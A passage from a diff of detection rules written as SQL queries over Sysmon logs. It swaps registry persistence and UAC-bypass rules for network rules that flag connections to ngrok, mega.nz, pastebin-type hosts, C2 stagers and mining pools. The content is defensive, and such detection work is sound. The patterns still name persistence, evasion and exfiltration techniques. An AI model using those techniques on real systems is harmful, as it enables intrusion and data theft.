'%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND Details LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND Details IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND Details LIKE '%}\\\\python-%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND Details = 'ctfmon.exe /n') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (Details LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((Image LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR Image LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND Details LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", + "title": "Microsoft Sync Center Suspicious Network Connections", + "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "status": "experimental", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", + "author": "elhoim", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" ], - "filename": "registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_susp_outbound_mobsync_connection.yml" }, { - "title": "Suspicious Service Installed", - "id": "f2485272-a156-4773-82d7-1d178bc4905b", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "status": "test", - "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." + "Unknown", + "@subTee in your network" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\') AND Details LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_susp_service_installed.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "Add Debugger Entry To AeDebug For Persistence", - "id": "092af964-4233-4373-b4ba-d86ea2890288", - "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.execution", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_aedebug_persistence.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "CrashControl CrashDump Disabled", - "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", - "status": "experimental", - "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "status": "test", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.t1564", - "attack.t1112" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ - "Legitimate disabling of crashdumps" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" ], - "filename": "registry_set_crashdump_disabled.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", - "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], + "title": "Suspicious Dropbox API Usage", + "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "status": "experimental", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate use of the API with a tool that the author wasn't aware of" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_susp_dropbox_api.yml" }, { - "title": "Scripted Diagnostics Turn Off Check Enabled - Registry", - "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", - "status": "experimental", - "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Dllhost Internet Connection", + "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "status": "test", + "description": "Detects Dllhost that communicates with public IP addresses", + "author": "bartblaze", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218", + "attack.execution", + "attack.t1559.001" ], "falsepositives": [ - "Administrator actions" + "Communication to other corporate systems that use IP addresses from public address spaces" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" ], - "filename": "registry_set_enabling_turnoffcheck.yml" + "filename": "net_connection_win_dllhost_net_connections.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Communication To Ngrok.Io", + "id": "18249279-932f-45e2-b37a-8925f2597670", + "status": "experimental", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR Details LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "author": "Lednyov Alexey, oscd.community, Sreeman", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of mega.nz uploaders and tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - "filename": "registry_set_telemetry_persistence.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "Potential Persistence Via Scrobj.dll COM Hijacking", - "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", - "status": "experimental", - "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", - "author": "frack113", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate use of the dll." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND Details LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_scrobj_dll.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Registry Modification to Hidden File Extension", - "id": "5df86130-4e95-4a54-90f7-26541b40aec2", - "status": "test", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": "stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE 